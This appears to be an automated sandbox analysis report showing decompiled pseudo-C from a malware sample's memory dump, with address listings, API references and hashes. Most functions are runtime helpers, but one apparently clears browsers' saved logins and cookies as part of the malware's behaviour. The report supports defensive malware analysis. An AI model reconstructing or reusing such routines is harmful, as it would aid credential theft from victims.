                                            0x00435eda
                                            0x00435edd
                                            0x00435ee3
                                            0x00435ee5
                                            0x00435f0a
                                            0x00435f14
                                            0x00435f1a
                                            0x00435f1c
                                            0x00435f22
                                            0x00435f24
                                            0x00436177
                                            0x00436178
                                            0x00000000
                                            0x00435f2a
                                            0x00435f2a
                                            0x00435f2e
                                            0x00436095
                                            0x00436095
                                            0x004360ac
                                            0x004360b1
                                            0x004360b4
                                            0x004360b6
                                            0x004360bc
                                            0x004360bc
                                            0x004360be
                                            0x004360be
                                            0x004360c1
                                            0x004360c3
                                            0x004360c9
                                            0x004360c9
                                            0x004360cb
                                            0x00436152
                                            0x00436152
                                            0x004360d1
                                            0x004360d1
                                            0x004360d3
                                            0x004360d9
                                            0x004360dc
                                            0x004360df
                                            0x004360e5
                                            0x00000000
                                            0x00000000
                                            0x004360e7
                                            0x004360eb
                                            0x00436114
                                            0x00436114
                                            0x00436116
                                            0x004360ed
                                            0x004360ed
                                            0x004360f1
                                            0x004360f5
                                            0x004360fc
                                            0x00436102
                                            0x00000000
                                            0x00436104
                                            0x00436104
                                            0x00436107
                                            0x0043610a
                                            0x00436112
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00436112
                                            0x00436102
                                            0x00436121
                                            0x00436121
                                            0x00436123
                                            0x00436151
                                            0x00436151
                                            0x00000000
                                            0x00436125
                                            0x00436125
                                            0x0043612b
                                            0x0043612c
                                            0x0043612d
                                            0x0043612e
                                            0x00436133
                                            0x00436139
                                            0x0043613c
                                            0x0043613e
                                            0x00436145
                                            0x00436147
                                            0x00436149
                                            0x00436140
                                            0x00436140
                                            0x00436141
                                            0x00000000
                                            0x00436141
                                            0x0043613e
                                            0x00000000
                                            0x00436123
                                            0x0043611a
                                            0x0043611c
                                            0x0043611f
                                            0x0043611f
                                            0x00000000
                                            0x0043611f
                                            0x00436158
                                            0x00436158
                                            0x00436159
                                            0x0043615c
                                            0x00436162
                                            0x00436162
                                            0x0043616b
                                            0x0043616d
                                            0x00000000
                                            0x0043616f
                                            0x0043616f
                                            0x00000000
                                            0x0043616f
                                            0x0043616d
                                            0x00000000
                                            0x00435f34
                                            0x00435f34
                                            0x00435f39
                                            0x00000000
                                            0x00435f3f
                                            0x00435f3f
                                            0x00435f44
                                            0x00000000
                                            0x00435f4a
                                            0x00435f4a
                                            0x00435f50
                                            0x00435f55
                                            0x00435f57
                                            0x00435f5e
                                            0x00435f5f
                                            0x00435f61
                                            0x00000000
                                            0x00000000
                                            0x00435f67
                                            0x00435f67
                                            0x00435f6b
                                            0x00435f71
                                            0x00000000
                                            0x00435f77
                                            0x00435f79
                                            0x00435f7a
                                            0x00435f7d
                                            0x00000000
                                            0x00435f83
                                            0x00435f83
                                            0x00435f89
                                            0x00435f8e
                                            0x00435f98
                                            0x00435f9c
                                            0x00435fa1
                                            0x00435fa4
                                            0x00435fa6
                                            0x00000000
                                            0x00435fa8
                                            0x00435fa8
                                            0x00435faa
                                            0x00435fad
                                            0x00435fad
                                            0x00435fb0
                                            0x00435fb3
                                            0x00435fb3
                                            0x00435fbe
                                            0x00435fc0
                                            0x00435fc2
                                            0x00000000
                                            0x00000000
                                            0x00435fc2
                                            0x00000000
                                            0x00435fc4
                                            0x00435fc4
                                            0x00435fca
                                            0x00435fcd
                                            0x00435fcd
                                            0x00435fdb
                                            0x00435fe4
                                            0x00435fe9
                                            0x00435fef
                                            0x00435ff2
                                            0x00435ff3
                                            0x00435ff5
                                            0x00436003
                                            0x00436003
                                            0x0043600a
                                            0x0043606b
                                            0x00000000
                                            0x0043600c
                                            0x0043600c
                                            0x0043601a
                                            0x0043601f
                                            0x00436022
                                            0x00436024
                                            0x00436194
                                            0x00436196
                                            0x00436197
                                            0x00436198
                                            0x00436199
                                            0x0043619a
                                            0x0043619b
                                            0x004361a0
                                            0x004361a3
                                            0x004361a4
                                            0x004361ac
                                            0x004361b3
                                            0x004361b6
                                            0x004361b7
                                            0x004361ba
                                            0x004361be
                                            0x004361bf
                                            0x004361c2
                                            0x004361d2
                                            0x004361de
                                            0x004361f5
                                            0x004361fa
                                            0x004361fd
                                            0x004361ff
                                            0x00436214
                                            0x00436217
                                            0x00436217
                                            0x0043621a
                                            0x00436220
                                            0x00436229
                                            0x0043622b
                                            0x0043622e
                                            0x00436235
                                            0x00436238
                                            0x0043623e
                                            0x00000000
                                            0x00000000
                                            0x00436240
                                            0x00436244
                                            0x0043626d
                                            0x0043626d
                                            0x00436246
                                            0x00436246
                                            0x0043624a
                                            0x0043624e
                                            0x00436255
                                            0x0043625b
                                            0x00000000
                                            0x0043625d
                                            0x0043625d
                                            0x00436260
                                            0x00436263
                                            0x0043626b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0043626b
                                            0x0043625b
                                            0x0043627a
                                            0x0043627a
                                            0x0043627c
                                            0x00436282
                                            0x00436288
                                            0x0043628b
                                            0x0043628b
                                            0x0043628e
                                            0x00436291
                                            0x00436291
                                            0x004362a1
                                            0x004362af
                                            0x004362b4
                                            0x004362bb
                                            0x004362bd
                                            0x00000000
                                            0x004362c3
                                            0x004362c9
                                            0x004362cf
                                            0x004362d6
                                            0x004362dc
                                            0x004362df
                                            0x004362e5
                                            0x004362f2
                                            0x004362f9
                                            0x004362fe
                                            0x00436301
                                            0x00436303
                                            0x0043655c
                                            0x00436562
                                            0x00436563
                                            0x00436564
                                            0x00436565
                                            0x00436566
                                            0x00436567
                                            0x0043656c
                                            0x0043656d
                                            0x00436572
                                            0x00436309
                                            0x00436309
                                            0x00436317
                                            0x0043631a
                                            0x00436335
                                            0x0043633c
                                            0x00436342
                                            0x00436348
                                            0x0043631c
                                            0x0043631c
                                            0x00436324
                                            0x00000000
                                            0x00436326
                                            0x00436326
                                            0x0043632c
                                            0x0043632c
                                            0x00436324
                                            0x0043634f
                                            0x00436352
                                            0x0043646f
                                            0x00436472
                                            0x0043647f
                                            0x00436482
                                            0x0043648a
                                            0x0043648a
                                            0x00436474
                                            0x0043647a
                                            0x0043647a
                                            0x00436358
                                            0x00436358
                                            0x0043635e
                                            0x00436366
                                            0x00436368
                                            0x0043636b
                                            0x00436374
                                            0x0043637d
                                            0x00436383
                                            0x00436383
                                            0x00436386
                                            0x00436388
                                            0x00000000
                                            0x00000000
                                            0x0043638a
                                            0x00436390
                                            0x00436391
                                            0x0043639c
                                            0x004363a4
                                            0x004363ac
                                            0x004363af
                                            0x004363b2
                                            0x004363b8
                                            0x004363be
                                            0x004363c4
                                            0x004363ca
                                            0x004363cd
                                            0x00000000
                                            0x00000000
                                            0x004363cf
                                            0x004363f4
                                            0x004363f4
                                            0x004363f7
                                            0x004363fb
                                            0x00436414
                                            0x00436419
                                            0x0043641c
                                            0x0043641e
                                            0x00436424
                                            0x0043645f
                                            0x00436426
                                            0x00436426
                                            0x0043642b
                                            0x00436433
                                            0x00436434
                                            0x00436434
                                            0x0043644b
                                            0x00436452
                                            0x00436455
                                            0x0043645a
                                            0x0043645a
                                            0x00436462
                                            0x00436465
                                            0x00436465
                                            0x0043646a
                                            0x00000000
                                            0x0043646a
                                            0x004363d1
                                            0x004363d3
                                            0x004363d8
                                            0x004363de
                                            0x004363e7
                                            0x004363f0
                                            0x004363f0
                                            0x00000000
                                            0x004363d3
                                            0x0043648d
                                            0x0043648d
                                            0x00436491
                                            0x00436499
                                            0x0043649f
                                            0x004364a2
                                            0x004364a8
                                            0x004364aa
                                            0x004364ea
                                            0x004364f0
                                            0x004364f7
                                            0x004364f7
                                            0x004364fd
                                            0x00436501
                                            0x00000000
                                            0x00436503
                                            0x00436503
                                            0x00436507
                                            0x0043650c
                                            0x00436510
                                            0x00436515
                                            0x0043651c
                                            0x0043652a
                                            0x00436530
                                            0x00436533
                                            0x00436533
                                            0x00436501
                                            0x00436542
                                            0x0043654a
                                            0x00436553
                                            0x004364ac
                                            0x004364b2
                                            0x004364b5
                                            0x004364bc
                                            0x004364ce
                                            0x004364d5
                                            0x004364e2
                                            0x00000000
                                            0x004364e2
                                            0x00000000
                                            0x004364aa
                                            0x00436303
                                            0x0043627e
                                            0x00000000
                                            0x0043627e
                                            0x00000000
                                            0x0043627c
                                            0x00436275
                                            0x00436277
                                            0x00436277
                                            0x00000000
                                            0x00436201
                                            0x00436201
                                            0x00436201
                                            0x00436203
                                            0x00436208
                                            0x00436213
                                            0x00436213
                                            0x0043602a
                                            0x0043602a
                                            0x0043602d
                                            0x00436032
                                            0x0043618f
                                            0x00000000
                                            0x00436038
                                            0x0043603a
                                            0x00436042
                                            0x00436048
                                            0x00436049
                                            0x0043604f
                                            0x00436050
                                            0x00436055
                                            0x00436058
                                            0x0043605a
                                            0x00436060
                                            0x00436062
                                            0x00436063
                                            0x00436063
                                            0x00436071
                                            0x00436071
                                            0x00436074
                                            0x00436076
                                            0x00436079
                                            0x00436087
                                            0x00436087
                                            0x00436171
                                            0x00436171
                                            0x00000000
                                            0x00436173
                                            0x00436173
                                            0x00000000
                                            0x0043607b
                                            0x0043607b
                                            0x0043607e
                                            0x00436081
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00436081
                                            0x00436079
                                            0x00436032
                                            0x00436024
                                            0x00435ff7
                                            0x00435ff9
                                            0x00435ffa
                                            0x00435ffd
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00435ffd
                                            0x00435ff5
                                            0x00435f7d
                                            0x00000000
                                            0x00435f71
                                            0x00000000
                                            0x0043608e
                                            0x00435f44
                                            0x00435f39
                                            0x00435f2e
                                            0x00435ee7
                                            0x00435ee7
                                            0x00435ee9
                                            0x00435eeb
                                            0x00435eec
                                            0x00435eed
                                            0x00435eee
                                            0x00435ef3
                                            0x0043617e
                                            0x00436183
                                            0x0043618e
                                            0x0043618e
                                            0x00435ee5
                                            0x00000000

                                            APIs
                                              • Part of subcall function 00436F33: RtlAllocateHeap.NTDLL(00000000,0042979C,?,?,0042AEE7,?,?,3.1.4 Light,?,?,0040869A,0042979C,?,?,?,?), ref: 00436F65
                                            • _free.LIBCMT ref: 00435E2E
                                            • _free.LIBCMT ref: 00435E45
                                            • _free.LIBCMT ref: 00435E64
                                            • _free.LIBCMT ref: 00435E7F
                                            • _free.LIBCMT ref: 00435E96
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: _free$AllocateHeap
                                            • String ID:
                                            • API String ID: 3033488037-0
                                            • Opcode ID: c0cf8aa46acb3aab5ac9459340ba374932e02ae66e25010a9891371af59e65f6
                                            • Instruction ID: 3ab9798c8b50e61d1a5cfdbe0cbb0608f98e3dd4944b7f5d8f972a78b0569c05
                                            • Opcode Fuzzy Hash: c0cf8aa46acb3aab5ac9459340ba374932e02ae66e25010a9891371af59e65f6
                                            • Instruction Fuzzy Hash: BD51C271A00B05AFDB20DF29C842B6B77F5EF4D724F14556EE809DB291E739EA018B48
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00434E40, Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 82%
                                            			E00434E40(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x45f014; // 0x8d941b67
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E00437CCE( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E00428B19(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E00428B19(_t78 + 4);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E00428B19(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E0043D545(_t56);
						_t40 = E00437795(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E0043D545(_t56);
						E00437795(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x45f014;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

























                                            0x00434e40
                                            0x00434e4a
                                            0x00434e4e
                                            0x00434e50
                                            0x00434e54
                                            0x00434e5e
                                            0x00434e6f
                                            0x00434e74
                                            0x00434e76
                                            0x00434e78
                                            0x00434e7a
                                            0x00434e7c
                                            0x00434e80
                                            0x00434f3a
                                            0x00434f48
                                            0x00434f4a
                                            0x00434f4f
                                            0x00434f56
                                            0x00434f66
                                            0x00434f75
                                            0x00434f78
                                            0x00434f7a
                                            0x00000000
                                            0x00434f7b
                                            0x00434e88
                                            0x00434e8d
                                            0x00434e92
                                            0x00434e94
                                            0x00434e94
                                            0x00434e96
                                            0x00434e9b
                                            0x00434e9f
                                            0x00434e9f
                                            0x00434ea2
                                            0x00434ec1
                                            0x00434ec1
                                            0x00434ec3
                                            0x00434ec6
                                            0x00434ecf
                                            0x00434ed2
                                            0x00434ed7
                                            0x00434eda
                                            0x00434edf
                                            0x00000000
                                            0x00000000
                                            0x00434ee1
                                            0x00000000
                                            0x00434ea4
                                            0x00434ea4
                                            0x00434ea6
                                            0x00434eaf
                                            0x00434eb2
                                            0x00434eb7
                                            0x00434eba
                                            0x00434ebf
                                            0x00434ee9
                                            0x00434eec
                                            0x00434eee
                                            0x00434ef1
                                            0x00434ef9
                                            0x00434eff
                                            0x00434f06
                                            0x00434f08
                                            0x00434f10
                                            0x00434f1f
                                            0x00434f23
                                            0x00434f25
                                            0x00434f28
                                            0x00000000
                                            0x00000000
                                            0x00434f2a
                                            0x00434f2d
                                            0x00434f2f
                                            0x00434f2f
                                            0x00434f30
                                            0x00434f32
                                            0x00434f35
                                            0x00000000
                                            0x00434f2f
                                            0x00000000
                                            0x00434ebf
                                            0x00434ea2
                                            0x00000000

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: _free
                                            • String ID:
                                            • API String ID: 269201875-0
                                            • Opcode ID: 20885e2c66322107ad0122869bfbff370a825e79fb07f9ef38d7d13b97ad32fd
                                            • Instruction ID: 82de8d1bc86fdd8a14ccccd3dcc6d3955932d6767b77447f34cf9239b38a9ef4
                                            • Opcode Fuzzy Hash: 20885e2c66322107ad0122869bfbff370a825e79fb07f9ef38d7d13b97ad32fd
                                            • Instruction Fuzzy Hash: 1641E276A002109FCB20DF79C881A9EB7E1EF89714F15456EE501EB391DB35BD01CB89
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043EB9C, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 81%
                                            			E0043EB9C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0x45f014; // 0x8d941b67
				_v8 = _t34 ^ _t70;
				E0042F367(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t53 =  *(_v24 + 8);
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E004294CB(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E0042B710(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E0042A340(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E00436F33(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00446D30();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}




















                                            0x0043eba4
                                            0x0043ebab
                                            0x0043ebb7
                                            0x0043ebbc
                                            0x0043ebc1
                                            0x0043ebc6
                                            0x0043ebc9
                                            0x0043ebcb
                                            0x0043ebcb
                                            0x0043ebd0
                                            0x0043ebe9
                                            0x0043ebef
                                            0x0043ebf4
                                            0x0043ec93
                                            0x0043ec97
                                            0x0043ec9c
                                            0x0043ec9c
                                            0x0043ecb8
                                            0x0043ecb8
                                            0x0043ebfa
                                            0x0043ec02
                                            0x0043ec06
                                            0x0043ec52
                                            0x0043ec54
                                            0x0043ec56
                                            0x0043ec5b
                                            0x0043ec72
                                            0x0043ec7a
                                            0x0043ec8a
                                            0x0043ec8a
                                            0x0043ec7a
                                            0x0043ec8c
                                            0x0043ec8d
                                            0x00000000
                                            0x0043ec92
                                            0x0043ec0d
                                            0x0043ec0f
                                            0x0043ec11
                                            0x0043ec19
                                            0x0043ec36
                                            0x0043ec40
                                            0x0043ec45
                                            0x00000000
                                            0x00000000
                                            0x0043ec47
                                            0x0043ec4d
                                            0x0043ec4d
                                            0x00000000
                                            0x0043ec4d
                                            0x0043ec1d
                                            0x0043ec21
                                            0x0043ec26
                                            0x0043ec2a
                                            0x00000000
                                            0x00000000
                                            0x0043ec2c
                                            0x00000000

                                            APIs
                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00431CBE,?,00000000,?,00000001,?,?,00000001,00431CBE,?), ref: 0043EBE9
                                            • __alloca_probe_16.LIBCMT ref: 0043EC21
                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043EC72
                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0043106F,?), ref: 0043EC84
                                            • __freea.LIBCMT ref: 0043EC8D
                                              • Part of subcall function 00436F33: RtlAllocateHeap.NTDLL(00000000,0042979C,?,?,0042AEE7,?,?,3.1.4 Light,?,?,0040869A,0042979C,?,?,?,?), ref: 00436F65
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                            • String ID:
                                            • API String ID: 313313983-0
                                            • Opcode ID: a66adcfb8316cbfd01b38d1c90e0a12bd6171c8dc87fa64750f4362bd346fe9b
                                            • Instruction ID: 960015fb1163eec86587da188c9b1506b6c8c6447b9ad3417088ce5c39e285a3
                                            • Opcode Fuzzy Hash: a66adcfb8316cbfd01b38d1c90e0a12bd6171c8dc87fa64750f4362bd346fe9b
                                            • Instruction Fuzzy Hash: 7A31D032A0121AABDF25DF66DC81DAF7BA5EB44710F04026AFC05D7290E739DC51CBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004079DA, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 103sleepCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 75%
                                            			E004079DA(void* __edi) {
				char _v5;
				char _v6;
				char _v7;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t18;
				void* _t36;
				intOrPtr _t40;
				char _t50;
				void* _t52;
				signed int _t53;
				signed int _t54;
				void* _t55;

				_t52 = __edi;
				_t54 = _t53 & 0xfffffff8;
				 *0x460a86 = 1;
				Sleep( *0x460a8c);
				_v7 = 0;
				_t36 = 0;
				_v6 = 0;
				_v5 = 0;
				goto L1;
				do {
					do {
						L1:
						_t59 = _t36;
						if(_t36 == 0) {
							L2:
							_t36 = E004078C0(_t59);
						}
						_t60 = _t36;
						if(_t36 == 0) {
							_t36 = E004076E4(_t52, _t60);
						}
						_t61 = _v6;
						if(_v6 == 0) {
							_v6 = E004074C9(_t36, _t52, _t61);
						}
						_t62 = _v7;
						if(_v7 == 0) {
							_v7 = E0040743A(_t62);
						}
						_t50 = _v5;
						_t63 = _t50;
						if(_t50 == 0) {
							_t50 = E004073AB(_t63);
							_v5 = _t50;
						}
						if(_t36 == 0 || _t36 == 0) {
							L16:
							Sleep(0x1388);
							_t18 = _v7;
							_t40 = _v6;
							_t50 = _v5;
						} else {
							_t18 = _v7;
							if(_t18 == 0 || _t50 == 0) {
								goto L16;
							} else {
								_t40 = _v6;
								if(_t40 == 0) {
									goto L16;
								}
							}
						}
						if(_t36 == 0) {
							goto L2;
						}
					} while (_t36 == 0 || _t18 == 0 || _t50 == 0);
					_t73 = _t40;
				} while (_t40 == 0);
				_t55 = _t54 - 0x18;
				E0040207E(_t36, _t55, "\n[Cleared browsers logins and cookies.]\n");
				E00407B4A();
				E0040207E(_t36, _t55, "Cleared browsers logins and cookies.");
				_t56 = _t55 - 0x18;
				E0040207E(_t36, _t55 - 0x18, "[Info]");
				E00410B51(_t36);
				E0040207E(_t36, _t56 + 0x18, 0x4554cc);
				_push(0xaf);
				E00401790(_t36, 0x4613f8, _t50, _t73);
				if( *0x460a85 != 0) {
					_push(0x4613f8);
					_push(0x4613f8);
					E0040BA25(0x461210, E00401F2E(0x461210));
				}
				 *0x460a86 = 0;
				return 0;
			}

















                                            0x004079da
                                            0x004079dd
                                            0x004079e8
                                            0x004079ef
                                            0x004079fb
                                            0x004079ff
                                            0x00407a01
                                            0x00407a07
                                            0x00407a07
                                            0x00407a0b
                                            0x00407a0b
                                            0x00407a0b
                                            0x00407a0b
                                            0x00407a0d
                                            0x00407a0f
                                            0x00407a14
                                            0x00407a14
                                            0x00407a16
                                            0x00407a18
                                            0x00407a1f
                                            0x00407a1f
                                            0x00407a25
                                            0x00407a27
                                            0x00407a2e
                                            0x00407a2e
                                            0x00407a36
                                            0x00407a38
                                            0x00407a3f
                                            0x00407a3f
                                            0x00407a43
                                            0x00407a47
                                            0x00407a49
                                            0x00407a50
                                            0x00407a52
                                            0x00407a52
                                            0x00407a58
                                            0x00407a72
                                            0x00407a77
                                            0x00407a7d
                                            0x00407a81
                                            0x00407a85
                                            0x00407a5e
                                            0x00407a5e
                                            0x00407a64
                                            0x00000000
                                            0x00407a6a
                                            0x00407a6a
                                            0x00407a70
                                            0x00000000
                                            0x00000000
                                            0x00407a70
                                            0x00407a64
                                            0x00407a8b
                                            0x00000000
                                            0x00000000
                                            0x00407a8d
                                            0x00407aa5
                                            0x00407aa5
                                            0x00407aad
                                            0x00407ab7
                                            0x00407abc
                                            0x00407ac8
                                            0x00407acd
                                            0x00407ad7
                                            0x00407adc
                                            0x00407aeb
                                            0x00407af0
                                            0x00407afa
                                            0x00407b06
                                            0x00407b08
                                            0x00407b09
                                            0x00407b16
                                            0x00407b1c
                                            0x00407b1d
                                            0x00407b2a

                                            APIs
                                            Strings
                                            • Cleared browsers logins and cookies., xrefs: 00407AC3
                                            • [Info], xrefs: 00407AD2
                                            • [Cleared browsers logins and cookies.], xrefs: 00407AB2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[Info]
                                            • API String ID: 3472027048-899236412
                                            • Opcode ID: 22d6a9bce0c3179897de210b1d603c07413b3d3dbf9ac400f51c3621cdccd67c
                                            • Instruction ID: 900d880e0aa31b3fe4609be3abb3ba6c041c070367441fcee50c0d96ef2cdb61
                                            • Opcode Fuzzy Hash: 22d6a9bce0c3179897de210b1d603c07413b3d3dbf9ac400f51c3621cdccd67c
                                            • Instruction Fuzzy Hash: CE317200B4C3806AD61167B558267AF7F915A93354F0888BFF8C4273D3E9BA5908D7AF
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043CDCA, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 93%
                                            			E0043CDCA() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E0043CD93(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E00436F33(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E00437795(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












                                            0x0043cdd9
                                            0x0043cddf
                                            0x0043ce37
                                            0x0043ce37
                                            0x0043cde1
                                            0x0043cde2
                                            0x0043cde7
                                            0x0043cdf0
                                            0x0043cdf6
                                            0x0043cdfc
                                            0x0043ce01
                                            0x00000000
                                            0x0043ce03
                                            0x0043ce09
                                            0x0043ce0e
                                            0x0043ce2c
                                            0x0043ce26
                                            0x0043ce26
                                            0x0043ce28
                                            0x0043ce28
                                            0x0043ce2f
                                            0x0043ce34
                                            0x0043ce01
                                            0x0043ce3b
                                            0x0043ce3e
                                            0x0043ce3e
                                            0x0043ce4c

                                            APIs
                                            • GetEnvironmentStringsW.KERNEL32 ref: 0043CDD3
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0043CDF6
